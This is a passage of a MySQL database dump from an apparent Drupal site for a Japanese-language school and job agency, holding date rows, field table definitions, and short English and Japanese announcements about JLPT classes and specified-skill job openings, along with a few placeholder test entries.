('activities', 0, 84, 465, 'ja', 0, '2024-05-29T14:30:00'),
('activities', 0, 85, 463, 'en', 0, '2024-06-04T02:30:00'),
('activities', 0, 85, 463, 'ja', 0, '2024-06-04T02:30:00'),
('activities', 0, 86, 467, 'en', 0, '2024-06-06T02:53:21'),
('activities', 0, 86, 467, 'ja', 0, '2024-06-06T02:53:21'),
('activities', 0, 87, 476, 'en', 0, '2024-05-30T02:30:00'),
('activities', 0, 87, 476, 'ja', 0, '2024-05-30T02:30:00'),
('activities', 0, 88, 471, 'en', 0, '2024-05-24T03:00:18'),
('activities', 0, 88, 471, 'ja', 0, '2024-05-24T03:00:18'),
('activities', 0, 89, 473, 'en', 0, '2024-05-23T03:07:37'),
('activities', 0, 89, 473, 'ja', 0, '2024-05-23T03:07:37'),
('activities', 0, 90, 478, 'en', 0, '2024-06-24T14:30:00'),
('activities', 0, 90, 478, 'ja', 0, '2024-06-24T14:30:00'),
('activities', 0, 91, 480, 'en', 0, '2024-05-23T03:12:35'),
('activities', 0, 91, 480, 'ja', 0, '2024-05-23T03:12:35'),
('activities', 0, 92, 482, 'en', 0, '2024-05-20T03:18:59'),
('activities', 0, 92, 482, 'ja', 0, '2024-05-20T03:18:59'),
('activities', 0, 93, 484, 'en', 0, '2024-05-18T03:26:00'),
('activities', 0, 93, 484, 'ja', 0, '2024-05-18T03:26:00'),
('activities', 0, 94, 485, 'en', 0, '2024-05-18T02:32:33'),
('activities', 0, 95, 524, 'en', 0, '2024-01-08T02:30:00'),
('activities', 0, 95, 524, 'ja', 0, '2024-01-08T02:30:00'),
('activities', 0, 96, 489, 'en', 0, '2024-05-18T02:30:45'),
('activities', 0, 96, 489, 'ja', 0, '2024-05-18T02:30:45'),
('activities', 0, 97, 491, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 97, 491, 'ja', 0, '2024-05-18T02:30:00'),
('activities', 0, 98, 493, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 98, 493, 'ja', 0, '2024-05-18T02:30:00'),
('activities', 0, 99, 495, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 99, 495, 'ja', 0, '2024-05-18T02:30:00'),
('activities', 0, 100, 497, 'en', 0, '2024-06-17T02:30:00'),
('activities', 0, 100, 497, 'ja', 0, '2024-06-17T02:30:00'),
('activities', 0, 101, 499, 'en', 0, '2024-06-07T02:30:00'),
('activities', 0, 101, 499, 'ja', 0, '2024-06-07T02:30:00'),
('activities', 0, 102, 501, 'en', 0, '2024-06-06T02:30:00'),
('activities', 0, 102, 501, 'ja', 0, '2024-06-06T02:30:00'),
('activities', 0, 103, 505, 'en', 0, '2024-02-18T02:30:00'),
('activities', 0, 103, 505, 'ja', 0, '2024-02-18T02:30:00'),
('activities', 0, 104, 504, 'en', 0, '2024-06-06T02:30:00'),
('activities', 0, 104, 504, 'ja', 0, '2024-06-06T02:30:00'),
('activities', 0, 105, 507, 'en', 0, '2024-02-15T02:30:00'),
('activities', 0, 105, 507, 'ja', 0, '2024-02-15T02:30:00'),
('activities', 0, 106, 509, 'en', 0, '2024-06-06T02:30:00'),
('activities', 0, 106, 509, 'ja', 0, '2024-06-06T02:30:00'),
('activities', 0, 107, 511, 'en', 0, '2024-05-29T02:30:00'),
('activities', 0, 107, 511, 'ja', 0, '2024-05-29T02:30:00'),
('activities', 0, 108, 513, 'en', 0, '2024-04-15T02:30:00'),
('activities', 0, 108, 513, 'ja', 0, '2024-04-15T02:30:00'),
('activities', 0, 109, 515, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 109, 515, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 110, 517, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 110, 517, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 111, 519, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 111, 519, 'ja', 0, '2024-05-19T02:30:00'),
('activities', 0, 112, 521, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 112, 521, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 113, 523, 'en', 0, '2024-05-29T02:30:00'),
('activities', 0, 113, 523, 'ja', 0, '2024-05-29T02:30:00'),
('activities', 0, 114, 526, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 114, 526, 'ja', 0, '2024-05-19T02:30:00'),
('activities', 0, 115, 528, 'en', 0, '2024-05-08T02:30:00'),
('activities', 0, 115, 528, 'ja', 0, '2024-05-08T02:30:00'),
('activities', 0, 116, 531, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 116, 531, 'ja', 0, '2024-05-18T02:30:00'),
('activities', 0, 117, 532, 'en', 0, '2024-03-27T02:30:00'),
('activities', 0, 117, 532, 'ja', 0, '2024-03-27T02:30:00'),
('activities', 0, 118, 534, 'en', 0, '2024-03-22T02:30:00'),
('activities', 0, 118, 534, 'ja', 0, '2024-03-22T02:30:00'),
('activities', 0, 119, 537, 'en', 0, '2024-03-22T02:30:00'),
('activities', 0, 119, 537, 'ja', 0, '2024-03-22T02:30:00'),
('activities', 0, 120, 539, 'en', 0, '2024-02-25T02:30:00'),
('activities', 0, 120, 539, 'ja', 0, '2024-02-25T02:30:00'),
('activities', 0, 121, 541, 'en', 0, '2024-03-22T02:30:00'),
('activities', 0, 121, 541, 'ja', 0, '2024-03-22T02:30:00'),
('activities', 0, 122, 544, 'en', 0, '2024-02-21T02:30:00'),
('activities', 0, 122, 544, 'ja', 0, '2024-02-21T02:30:00'),
('activities', 0, 123, 545, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 123, 545, 'ja', 0, '2024-03-16T02:30:00'),
('activities', 0, 124, 547, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 124, 547, 'ja', 0, '2024-03-16T02:30:00'),
('activities', 0, 125, 549, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 125, 549, 'ja', 0, '2024-03-16T02:30:00'),
('activities', 0, 126, 551, 'en', 0, '2024-04-10T02:30:00'),
('activities', 0, 126, 551, 'ja', 0, '2024-04-10T02:30:00'),
('activities', 0, 127, 553, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 127, 553, 'ja', 0, '2024-03-16T02:30:00'),
('activities', 0, 128, 555, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 128, 555, 'ja', 0, '2024-03-09T02:30:00'),
('activities', 0, 129, 557, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 129, 557, 'ja', 0, '2024-03-09T02:30:00'),
('activities', 0, 130, 559, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 130, 559, 'ja', 0, '2024-03-09T02:30:00'),
('activities', 0, 131, 561, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 131, 561, 'ja', 0, '2024-03-09T02:30:00'),
('activities', 0, 132, 563, 'en', 0, '2024-01-24T02:30:00'),
('activities', 0, 132, 563, 'ja', 0, '2024-01-24T02:30:00'),
('activities', 0, 133, 565, 'en', 0, '2024-04-06T02:30:00'),
('activities', 0, 133, 565, 'ja', 0, '2024-04-06T02:30:00'),
('activities', 0, 134, 567, 'en', 0, '2024-01-22T02:30:00'),
('activities', 0, 134, 567, 'ja', 0, '2024-01-22T02:30:00'),
('activities', 0, 135, 569, 'en', 0, '2024-04-03T02:30:00'),
('activities', 0, 135, 569, 'ja', 0, '2024-04-03T02:30:00'),
('activities', 0, 136, 571, 'en', 0, '2024-02-07T02:30:00'),
('activities', 0, 136, 571, 'ja', 0, '2024-02-07T02:30:00'),
('activities', 0, 137, 573, 'en', 0, '2024-01-20T02:30:00'),
('activities', 0, 137, 573, 'ja', 0, '2024-01-20T02:30:00'),
('activities', 0, 138, 575, 'en', 0, '2024-02-07T02:30:00'),
('activities', 0, 138, 575, 'ja', 0, '2024-02-07T02:30:00'),
('activities', 0, 139, 577, 'en', 0, '2024-01-20T02:30:00'),
('activities', 0, 139, 577, 'ja', 0, '2024-01-20T02:30:00'),
('activities', 0, 140, 579, 'en', 0, '2024-01-15T02:30:00'),
('activities', 0, 140, 579, 'ja', 0, '2024-01-15T02:30:00'),
('activities', 0, 141, 581, 'en', 0, '2024-01-20T02:30:00'),
('activities', 0, 141, 581, 'ja', 0, '2024-01-20T02:30:00'),
('activities', 0, 142, 583, 'en', 0, '2024-01-15T02:30:00'),
('activities', 0, 142, 583, 'ja', 0, '2024-01-15T02:30:00'),
('activities', 0, 143, 585, 'en', 0, '2024-01-19T02:30:00'),
('activities', 0, 143, 585, 'ja', 0, '2024-01-19T02:30:00'),
('activities', 0, 144, 587, 'en', 0, '2024-01-19T02:30:00'),
('activities', 0, 144, 587, 'ja', 0, '2024-01-19T02:30:00'),
('activities', 0, 145, 589, 'en', 0, '2024-06-27T21:30:00'),
('activities', 0, 145, 589, 'ja', 0, '2024-06-27T21:30:00'),
('activities', 0, 146, 593, 'en', 0, '2024-06-28T02:30:00'),
('activities', 0, 146, 593, 'ja', 0, '2024-06-28T02:30:00'),
('activities', 0, 147, 595, 'en', 0, '2024-06-28T02:30:00'),
('activities', 0, 147, 595, 'ja', 0, '2024-06-28T02:30:00'),
('activities', 0, 148, 597, 'en', 0, '2024-07-02T02:30:00'),
('activities', 0, 148, 597, 'ja', 0, '2024-07-02T02:30:00'),
('activities', 0, 149, 598, 'en', 0, '2024-07-02T02:30:00'),
('activities', 0, 150, 600, 'en', 0, '2024-06-30T02:30:00'),
('activities', 0, 150, 600, 'ja', 0, '2024-06-30T02:30:00'),
('activities', 0, 151, 602, 'en', 0, '2024-07-04T02:30:00'),
('activities', 0, 151, 602, 'ja', 0, '2024-07-04T02:30:00'),
('activities', 0, 152, 604, 'en', 0, '2024-07-04T04:00:00'),
('activities', 0, 152, 604, 'ja', 0, '2024-07-04T04:00:00'),
('activities', 0, 153, 606, 'en', 0, '2024-07-08T02:30:00'),
('activities', 0, 153, 606, 'ja', 0, '2024-07-08T02:30:00'),
('activities', 0, 154, 609, 'en', 0, '2026-06-14T03:06:33'),
('activities', 0, 154, 609, 'ja', 0, '2026-06-14T03:06:33'),
('activities', 0, 156, 613, 'en', 0, '2026-04-21T02:30:35'),
('activities', 0, 156, 613, 'ja', 0, '2026-04-21T02:30:35'),
('activities', 0, 157, 615, 'en', 0, '2026-04-26T02:38:08'),
('activities', 0, 157, 615, 'ja', 0, '2026-04-26T02:38:08'),
('activities', 0, 160, 660, 'en', 0, '2026-03-02T03:29:03'),
('activities', 0, 160, 660, 'ja', 0, '2026-03-02T03:29:03'),
('activities', 0, 161, 659, 'en', 0, '2026-02-03T02:32:13'),
('activities', 0, 161, 659, 'ja', 0, '2026-02-03T02:32:13'),
('activities', 0, 165, 631, 'en', 0, '2026-06-03T03:26:57'),
('activities', 0, 165, 631, 'ja', 0, '2026-06-03T03:26:57'),
('activities', 0, 166, 634, 'en', 0, '2026-05-20T02:37:33'),
('activities', 0, 166, 634, 'ja', 0, '2026-05-20T02:37:33'),
('activities', 0, 167, 636, 'en', 0, '2026-04-23T02:42:11'),
('activities', 0, 167, 636, 'ja', 0, '2026-04-23T02:42:11'),
('activities', 0, 168, 638, 'en', 0, '2026-05-20T02:45:35'),
('activities', 0, 168, 638, 'ja', 0, '2026-05-20T02:45:35'),
('activities', 0, 169, 640, 'en', 0, '2026-05-10T02:51:29'),
('activities', 0, 169, 640, 'ja', 0, '2026-05-10T02:51:29'),
('activities', 0, 170, 642, 'en', 0, '2026-05-02T03:13:00'),
('activities', 0, 170, 642, 'ja', 0, '2026-05-02T03:13:00'),
('activities', 0, 171, 644, 'en', 0, '2026-04-26T03:18:51'),
('activities', 0, 171, 644, 'ja', 0, '2026-04-26T03:18:51'),
('activities', 0, 173, 648, 'en', 0, '2026-04-22T02:41:09'),
('activities', 0, 173, 648, 'ja', 0, '2026-04-22T02:41:09'),
('activities', 0, 174, 650, 'en', 0, '2026-04-01T02:45:23'),
('activities', 0, 174, 650, 'ja', 0, '2026-04-01T02:45:23'),
('activities', 0, 175, 652, 'en', 0, '2026-03-29T02:50:53'),
('activities', 0, 175, 652, 'ja', 0, '2026-03-29T02:50:53'),
('activities', 0, 176, 654, 'en', 0, '2026-03-05T02:59:46'),
('activities', 0, 176, 654, 'ja', 0, '2026-03-05T02:59:46'),
('activities', 0, 177, 656, 'en', 0, '2026-02-12T03:11:34'),
('activities', 0, 177, 656, 'ja', 0, '2026-02-12T03:11:34'),
('activities', 0, 178, 662, 'en', 0, '2026-05-02T03:23:32'),
('activities', 0, 178, 662, 'ja', 0, '2026-05-02T03:23:32'),
('activities', 0, 179, 664, 'en', 0, '2026-02-03T02:53:12'),
('activities', 0, 179, 664, 'ja', 0, '2026-02-03T02:53:12'),
('activities', 0, 180, 667, 'en', 0, '2026-02-03T02:55:33'),
('activities', 0, 180, 667, 'ja', 0, '2026-02-03T02:55:33'),
('activities', 0, 181, 669, 'en', 0, '2026-01-30T02:59:01'),
('activities', 0, 181, 669, 'ja', 0, '2026-01-30T02:59:01'),
('activities', 0, 182, 671, 'en', 0, '2026-01-30T03:02:28'),
('activities', 0, 182, 671, 'ja', 0, '2026-01-30T03:02:28'),
('activities', 0, 183, 673, 'en', 0, '2026-01-30T03:04:54'),
('activities', 0, 183, 673, 'ja', 0, '2026-01-30T03:04:54'),
('activities', 0, 184, 675, 'en', 0, '2026-01-26T03:08:44'),
('activities', 0, 184, 675, 'ja', 0, '2026-01-26T03:08:44'),
('activities', 0, 185, 678, 'en', 0, '2026-01-24T03:13:06'),
('activities', 0, 185, 678, 'ja', 0, '2026-01-24T03:13:06'),
('activities', 0, 186, 680, 'en', 0, '2026-01-24T03:16:45'),
('activities', 0, 186, 680, 'ja', 0, '2026-01-24T03:16:45'),
('activities', 0, 187, 682, 'en', 0, '2026-01-24T02:58:11'),
('activities', 0, 187, 682, 'ja', 0, '2026-01-24T02:58:11'),
('activities', 0, 188, 684, 'en', 0, '2026-01-22T03:23:25'),
('activities', 0, 188, 684, 'ja', 0, '2026-01-22T03:23:25'),
('activities', 0, 189, 686, 'en', 0, '2026-01-22T02:32:11'),
('activities', 0, 189, 686, 'ja', 0, '2026-01-22T02:32:11'),
('activities', 0, 190, 689, 'en', 0, '2026-01-22T03:10:53'),
('activities', 0, 191, 691, 'en', 0, '2026-01-22T03:12:07'),
('activities', 0, 191, 691, 'ja', 0, '2026-01-22T03:12:07'),
('activities', 0, 192, 693, 'en', 0, '2026-01-21T03:15:03'),
('activities', 0, 192, 693, 'ja', 0, '2026-01-21T03:15:03'),
('activities', 0, 193, 696, 'en', 0, '2026-01-21T03:18:18'),
('activities', 0, 193, 696, 'ja', 0, '2026-01-21T03:18:18'),
('activities', 0, 194, 698, 'en', 0, '2026-01-21T03:26:17'),
('activities', 0, 194, 698, 'ja', 0, '2026-01-21T03:26:17'),
('activities', 0, 195, 700, 'en', 0, '2026-01-21T02:31:50'),
('activities', 0, 195, 700, 'ja', 0, '2026-01-21T02:31:50'),
('activities', 0, 196, 702, 'en', 0, '2026-01-21T02:34:41'),
('activities', 0, 196, 702, 'ja', 0, '2026-01-21T02:34:41'),
('activities', 0, 197, 704, 'en', 0, '2026-01-19T02:47:14'),
('activities', 0, 197, 704, 'ja', 0, '2026-01-19T02:47:14'),
('activities', 0, 198, 706, 'en', 0, '2026-01-19T02:53:39'),
('activities', 0, 198, 706, 'ja', 0, '2026-01-19T02:53:39'),
('activities', 0, 199, 708, 'en', 0, '2026-01-19T02:59:40'),
('activities', 0, 199, 708, 'ja', 0, '2026-01-19T02:59:40'),
('activities', 0, 200, 710, 'en', 0, '2026-01-19T03:02:51'),
('activities', 0, 200, 710, 'ja', 0, '2026-01-19T03:02:51');

-- --------------------------------------------------------

--
-- Table structure for table `node__field_announce_post_date`
--

CREATE TABLE `node__field_announce_post_date` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_announce_post_date_value` varchar(20) NOT NULL COMMENT 'The date value.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field field_announce_post_date.';

--
-- Dumping data for table `node__field_announce_post_date`
--

INSERT INTO `node__field_announce_post_date` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_announce_post_date_value`) VALUES
('announcement', 0, 3, 213, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 213, 'ja', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 213, 'ko', 0, '2023-06-20T05:16:05'),
('announcement', 0, 4, 210, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 210, 'ja', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 210, 'ko', 0, '2023-06-22T05:18:32'),
('announcement', 0, 5, 359, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 359, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 359, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 10, 358, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 358, 'ja', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 358, 'ko', 0, '2023-06-21T12:57:26'),
('announcement', 0, 18, 357, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 357, 'ja', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 357, 'ko', 0, '2023-06-23T03:19:15'),
('announcement', 0, 30, 226, 'en', 0, '2023-07-09T03:29:30'),
('announcement', 0, 30, 226, 'ja', 0, '2023-07-09T03:29:30'),
('announcement', 0, 30, 226, 'ko', 0, '2023-07-09T03:29:30'),
('announcement', 0, 31, 259, 'en', 0, '2023-07-21T03:25:47'),
('announcement', 0, 62, 409, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 409, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 66, 420, 'en', 0, '2024-02-06T04:43:44'),
('announcement', 0, 155, 611, 'en', 0, '2026-06-14T03:29:57'),
('announcement', 0, 155, 611, 'ja', 0, '2026-06-14T03:29:57'),
('announcement', 0, 162, 625, 'en', 0, '2026-06-17T02:59:33'),
('announcement', 0, 162, 625, 'ja', 0, '2026-06-17T02:59:33'),
('announcement', 0, 163, 627, 'en', 0, '2026-06-16T03:06:09'),
('announcement', 0, 163, 627, 'ja', 0, '2026-06-16T03:06:09');

-- --------------------------------------------------------

--
-- Table structure for table `node__field_center_description`
--

CREATE TABLE `node__field_center_description` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_center_description_value` longtext NOT NULL,
  `field_center_description_summary` longtext,
  `field_center_description_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='Data storage for node field field_center_description.';

--
-- Dumping data for table `node__field_center_description`
--

INSERT INTO `node__field_center_description` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_center_description_value`, `field_center_description_summary`, `field_center_description_format`) VALUES
('language_center', 0, 204, 720, 'ja', 0, '<p>he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</p>', '', 'basic_html'),
('language_center', 0, 205, 721, 'ja', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
('language_center', 0, 206, 723, 'ja', 0, '<p>sdfsdf sfdsdf sdf sdf sdfsdfs fdsdf&nbsp;</p>', '', 'full_html');

-- --------------------------------------------------------

--
-- Table structure for table `node__field_center_download_file`
--

CREATE TABLE `node__field_center_download_file` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_center_download_file_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_center_download_file_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_center_download_file_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='Data storage for node field field_center_download_file.';

-- --------------------------------------------------------

--
-- Table structure for table `node__field_center_img`
--

CREATE TABLE `node__field_center_img` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_center_img_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_center_img_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_center_img_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_center_img_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_center_img_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='Data storage for node field field_center_img.';

--
-- Dumping data for table `node__field_center_img`
--

INSERT INTO `node__field_center_img` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_center_img_target_id`, `field_center_img_alt`, `field_center_img_title`, `field_center_img_width`, `field_center_img_height`) VALUES
('language_center', 0, 204, 720, 'ja', 0, 879, '', '', 1200, 715),
('language_center', 0, 205, 721, 'ja', 0, 880, '', '', 1200, 715),
('language_center', 0, 206, 723, 'ja', 0, 881, '', '', 1200, 715);

-- --------------------------------------------------------

--
-- Table structure for table `node__field_center_post_date`
--

CREATE TABLE `node__field_center_post_date` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_center_post_date_value` varchar(20) NOT NULL COMMENT 'The date value.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='Data storage for node field field_center_post_date.';

--
-- Dumping data for table `node__field_center_post_date`
--

INSERT INTO `node__field_center_post_date` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_center_post_date_value`) VALUES
('language_center', 0, 204, 720, 'ja', 0, '2026-08-26T13:34:17'),
('language_center', 0, 205, 721, 'ja', 0, '2026-08-25T13:53:05'),
('language_center', 0, 206, 723, 'ja', 0, '2026-08-28T13:53:47');

-- --------------------------------------------------------

--
-- Table structure for table `node__field_description`
--

CREATE TABLE `node__field_description` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_description_value` longtext NOT NULL,
  `field_description_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field field_description.';

--
-- Dumping data for table `node__field_description`
--

INSERT INTO `node__field_description` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_description_value`, `field_description_format`) VALUES
('announcement', 0, 62, 409, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes.&nbsp;</p>', 'full_html'),
('announcement', 0, 62, 409, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', 'full_html'),
('announcement', 0, 155, 611, 'en', 0, '<p>Hotel Tokutei Preparation Class – New Intake Open</p>', 'full_html'),
('announcement', 0, 155, 611, 'ja', 0, '<p>ホテル特定技能対策クラス 新規開講</p>', 'full_html'),
('announcement', 0, 162, 625, 'en', 0, '<p>Exciting career opportunity for JLPT N2 holders with a Tokutei Ginou Kaigo Certificate to work in Aichi Prefecture, Japan.</p>', 'full_html'),
('announcement', 0, 162, 625, 'ja', 0, '<p>JLPT N2および特定技能（介護）資格保持者を対象とした愛知県での訪問介護求人です。</p>', 'full_html'),
('announcement', 0, 163, 627, 'en', 0, '<p>Employment opportunity in Tsukuba City, Ibaraki Prefecture for candidates with agricultural experience and JLPT N4 or above.</p>', 'full_html'),
('announcement', 0, 163, 627, 'ja', 0, '<p>農業経験があり、JLPT N4以上の方を対象とした茨城県つくば市での特定技能（農業）求人です。</p>', 'full_html');

-- --------------------------------------------------------

--
-- Table structure for table `node__field_download_file`
--

CREATE TABLE `node__field_download_file` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_download_file_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_download_file_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_download_file_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field field_download_file.';

-- --------------------------------------------------------

--
-- Table structure for table `node__field_image`
--

CREATE TABLE `node__field_image` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
